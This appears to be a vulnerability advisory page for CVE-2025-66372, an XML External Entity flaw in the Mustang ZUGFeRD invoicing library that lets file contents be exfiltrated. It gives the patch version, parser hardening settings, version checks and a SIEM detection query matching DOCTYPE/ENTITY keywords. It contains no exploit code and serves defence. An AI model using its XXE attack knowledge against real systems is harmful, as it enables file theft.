CVE-2025-66372
📋 TL;DR
CVE-2025-66372 is an XML External Entity (XXE) vulnerability in Mustang library versions before 2.16.3 that allows attackers to exfiltrate files from affected systems. This affects applications using Mustang for XML processing, particularly in ZUGFeRD electronic invoicing implementations. The vulnerability requires attacker-controlled XML input to be processed by the vulnerable library.
💻 Affected Systems
- Mustang (ZUGFeRD library)
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Attackers could exfiltrate sensitive files including configuration files, credentials, or application data, potentially leading to data breaches or further system compromise.
Likely Case
Limited file exfiltration from the application's accessible file system, potentially exposing configuration or temporary files.
If Mitigated
No impact if XML parsing is properly configured to disable external entity resolution or if input validation blocks malicious XML.
🎯 Exploit Status
Exploitation requires the application to process attacker-controlled XML input. No public exploit code is currently available.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.16.3
Vendor Advisory: https://github.com/ZUGFeRD/mustangproject/releases/tag/core-2.16.3
Restart Required: Yes
Instructions:
1. Update Mustang dependency to version 2.16.3 or later. 2. Update pom.xml or build.gradle to use the fixed version. 3. Rebuild and redeploy the application. 4. Restart the application server.
🔧 Temporary Workarounds
Disable XXE in XML parser
allConfigure XML parser to disable external entity resolution before processing untrusted XML
// Java code: DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
// factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
// factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
Input validation and sanitization
allValidate and sanitize XML input before processing, rejecting suspicious content
// Implement XML schema validation
// Use whitelisting for allowed XML elements
// Reject XML containing DOCTYPE declarations
🧯 If You Can't Patch
- Implement network segmentation to isolate systems using vulnerable Mustang versions
- Deploy web application firewall (WAF) rules to block XML containing external entity declarations
🔍 How to Verify
Check if Vulnerable:
Check if your application uses Mustang library version below 2.16.3. Review dependency files (pom.xml, build.gradle) or check deployed JAR files.Check Version:
mvn dependency:tree | grep mustang OR gradle dependencies | grep mustang OR check MANIFEST.MF in mustang JAR filesVerify Fix Applied:
Confirm Mustang version is 2.16.3 or higher in dependencies. Test XML processing with malicious XXE payloads to ensure they are blocked.📡 Detection & Monitoring
Log Indicators:
- XML parsing errors related to external entities
- Unusual file access patterns from application process
- Large outbound XML responses containing file contents
Network Indicators:
- XML requests containing DOCTYPE declarations with SYSTEM entities
- Outbound connections to unexpected URLs in XML entity references
SIEM Query:
source="application.logs" AND ("DOCTYPE" OR "SYSTEM" OR "ENTITY") AND "xml"